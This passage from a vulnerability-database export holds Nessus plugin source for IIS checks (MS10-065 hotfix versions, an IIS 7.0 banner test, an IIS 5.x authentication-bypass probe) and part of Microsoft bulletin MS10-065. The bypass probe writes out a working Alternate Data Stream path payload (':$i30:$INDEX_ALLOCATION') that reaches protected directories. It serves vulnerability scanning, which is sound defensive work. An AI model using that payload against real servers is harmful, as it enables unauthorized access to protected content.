audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 and Windows Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", file:\"Asp.dll\", version:\"7.5.7600.20741\", min_version:\"7.5.7600.20000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Asp.dll\", version:\"7.5.7600.16620\", min_version:\"7.5.7600.16000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Cgi.dll\", version:\"7.5.7600.20752\", min_version:\"7.5.7600.20000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2271195') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Cgi.dll\", version:\"7.5.7600.16632\", min_version:\"7.5.7600.16000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2271195') ||\n\n # Vista / Windows 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Asp.dll\", version:\"7.0.6002.22431\", min_version:\"7.0.6002.22000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Asp.dll\", version:\"7.0.6002.18276\", min_version:\"7.0.6002.18000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Asp.dll\", version:\"7.0.6001.22718\", min_version:\"7.0.6001.22000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Asp.dll\", version:\"7.0.6001.18497\", min_version:\"7.0.6001.18000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n\n # Windows 2003 / XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Asp.dll\", version:\"6.0.3790.4735\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n\n # Windows XP x86\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Infocomm.dll\", version:\"6.0.2600.6018\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2290570') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Asp51.dll\", version:\"5.1.2600.6007\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261')\n)\n{\n set_kb_item(name:'SMB/Missing/MS10-065', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:48", "description": "According to the HTTP server banner the remote server is IIS 7.0. The server may be vulnerable to a number of vulnerabilities including a couple of remote code execution vulnerabilities.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1446", "CVE-2009-3555", "CVE-2010-1256", "CVE-2010-1899", "CVE-2010-2566", "CVE-2010-2730", "CVE-2010-2731"], "modified": "2020-08-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:iis"], "id": "IIS_7_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/108808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(108808);\n script_version (\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\n \"CVE-2008-1446\",\n \"CVE-2009-3555\",\n \"CVE-2010-1256\",\n \"CVE-2010-1899\",\n \"CVE-2010-2566\",\n \"CVE-2010-2730\",\n \"CVE-2010-2731\"\n );\n script_bugtraq_id(\n 31682,\n 36935,\n 40573,\n 42246,\n 41314,\n 43138,\n 43140\n );\n script_xref(name:\"MSFT\", value:\"MS08-062\");\n script_xref(name:\"MSFT\", value:\"MS10-040\");\n script_xref(name:\"MSFT\", value:\"MS10-049\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"953155\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n script_xref(name:\"MSKB\", value:\"982666\");\n script_xref(name:\"MSKB\", value:\"973917\");\n script_xref(name:\"MSKB\", value:\"980436\");\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"IAVB\", value:\"2010-B-0045-S\");\n script_xref(name:\"IAVB\", value:\"2008-B-0075-S\");\n\n script_name(english:\"Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS)\");\n script_summary(english: \"Checks the web server banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may allow remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the HTTP server banner the remote server is\nIIS 7.0. The server may be vulnerable to a number of\nvulnerabilities including a couple of remote code execution\nvulnerabilities.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure the appropriate patches have been applied.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 310);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Web Servers\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/iis\", \"Settings/ParanoidReport\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n audit(AUDIT_PCI);\n}\n\nif (report_paranoia < 2)\n{\n audit(AUDIT_PARANOID);\n}\n\nget_kb_item_or_exit(\"www/iis\");\n\napp = \"Microsoft IIS\";\nport = get_http_port(default:80);\nbanner = get_http_banner(port:port);\nif (empty_or_null(banner) || \"Server: Microsoft-IIS\" >!< banner)\n{\n audit(AUDIT_NOT_DETECT, app, port);\n}\n\nif (\"Server: Microsoft-IIS/7.0\" >!< banner)\n{\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n}\n\nsecurity_report_v4(severity:SECURITY_HOLE, port:port);\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:18:44", "description": "The version of IIS 5.x installed on the remote host is affected by an authentication bypass vulnerability. It is possible to access protected web directories without authentication through use of an Alternate Data Stream to open protected folders.\n\nA remote, unauthenticated attacker can leverage this issue to gain access to protected web directories.", "cvss3": {"score": null, "vector": null}, "published": "2010-07-05T00:00:00", "type": "nessus", "title": "IIS 5.x Alternate Data Stream Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2731"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:microsoft:iis"], "id": "IIS_ALTERNATE_DATA_STREAM_AUTHENTICATION_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/47594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47594);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-2731\");\n script_bugtraq_id(41314);\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n script_xref(name:\"SECUNIA\", value:\"40412\");\n\n script_name(english:\"IIS 5.x Alternate Data Stream Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an authentication bypass\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IIS 5.x installed on the remote host is affected by an\nauthentication bypass vulnerability. It is possible to access\nprotected web directories without authentication through use of an\nAlternate Data Stream to open protected folders.\n\nA remote, unauthenticated attacker can leverage this issue to gain\naccess to protected web directories.\");\n # https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4d2feac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/Jul/12\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-065\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?fcfe6e78\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for IIS 5.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-2731\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\", \"webmirror.nasl\");\n script_require_keys(\"www/ASP\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif (!banner) exit(1, \"Unable to get the banner from the web server on port \"+port+\".\");\nif (\"Server: Microsoft-IIS/5\" >!< banner) exit(0, \"The web server on port \"+port+\" does not appear to be IIS 5.x\");\n\n\n# We need a protected page for our test.\npages = pages = get_kb_list(\"www/\"+port+\"/content/auth_required\");\nif (isnull(pages)) exit(0, \"No protected pages were detected on the web server on port \"+port+\".\");\npages = make_list(pages);\n\n# Try to get a protected subdirectory. This doesn't appear\n# to work against the root directory\npage = NULL;\nfor (i=0; i<max_index(pages); i++)\n{\n if (pages[i] =~ '^/[^/]+/.*')\n {\n page = pages[i];\n break;\n }\n}\nif (isnull(page)) exit(0, \"No protected subdirectories were detected on the web server on port \"+port+\".\");\nif (ereg(pattern:'/$', string:page)) page += 'default.asp';\n\n\n# Try a bogus attack.\nurl = ereg_replace(pattern:\"^(/.*)(/[^/]+)$\", replace:\"\\1:$i42:$NESSUS_CHECK\\2\", string:page);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif (res[0] !~ \" (200|404)\") exit(1, \"The web server on port \"+port+\" didn't respond with a 202/404 response code to a bogus query.\");\n\n\n# And now the real attack.\nurl = ereg_replace(pattern:\"^(/.*)(/[^/]+)$\", replace:\"\\1:$i30:$INDEX_ALLOCATION\\2\", string:page);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif (\n res[0] =~ '^HTTP/1\\\\.1 200' ||\n (report_paranoia > 1 && res[0] =~ '^HTTP/1\\\\.1 404')\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n' +\n 'Nessus was able to reproduce the issue using the following URL : \\n' +\n build_url(port:port, qs:url) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nexit(0, \"The IIS server on port \" + port + \" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:36", "description": "Microsoft Security Bulletin MS10-065 - Important\r\nVulnerabilities in Microsoft Internet Information Services &#40;IIS&#41; Could Allow Remote Code Execution &#40;2267960&#41;\r\nPublished: September 14, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves two privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Information Services &#40;IIS&#41;. The most severe of these vulnerabilities could allow remote code execution if a client sends a specially crafted HTTP request to the server. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nThis security update is rated Important for IIS 5.1, IIS 6.0, IIS 7.0, and IIS 7.5. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by modifying the way that IIS handles specially crafted HTTP requests. For more information about the vulnerabilities, see the Frequently Asked Questions &#40;FAQ&#41; subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update at the earliest opportunity using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 2267960 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. When currently known issues and recommended solutions pertain only to specific releases of this software, this article provides links to further articles.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nInternet Information Services ASP\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Information Services 5.1\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 6.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nInternet Information Services FastCGI\t \t \t \t \r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5*\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nInternet Information Services Authentication\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Information Services 5.1\r\n&#40;KB2290570&#41;\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions &#40;FAQ&#41; Related to This Security Update\r\n\r\nWhy are there three separate updates for this bulletin? \r\nThere are three separate updates due to the discrepancy in affected products for each vulnerability addressed in this bulletin. Please refer to the Affected Software table to determine which updates apply to your Web server.\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin&#39;s release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the September bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tIIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\tRequest Header Buffer Overflow Vulnerability - CVE-2010-2730\tDirectory Authentication Bypass Vulnerability - CVE-2010-2731\tAggregate Severity Rating\r\nInternet Information Services ASP\t \t \t \t \r\n\r\nInternet Information Services 5.1 on Windows XP Service Pack 3\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows XP Professional x64 Edition Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 x64 Edition Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 with SP2 for Itanium-based Systems\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for 32-bit Systems\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for x64-based Systems\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for x64-based Systems*\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for Itanium-based Systems\r\n&#40;KB2124261&#41;\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\nInternet Information Services FastCGI\t \t \t \t \r\n\r\nInternet Information Services 7.5 on Windows 7 for 32-bit Systems\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for x64-based Systems\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for x64-based Systems*\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for Itanium-based Systems\r\n&#40;KB2271195&#41;\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\nInternet Information Services Authentication\t \t \t \t \r\n\r\nInternet Information Services 5.1 on Windows XP Service Pack 3\r\n&#40;KB2290570&#41;\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nIIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nA denial of service vulnerability exists in Internet Information Services &#40;IIS&#41; that could allow an attacker who successfully exploited this vulnerability to interrupt service, causing the server to become un-responsive. An attacker could exploit the vulnerability by sending specially crafted URL requests to active server pages on a Web site hosted by IIS.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see 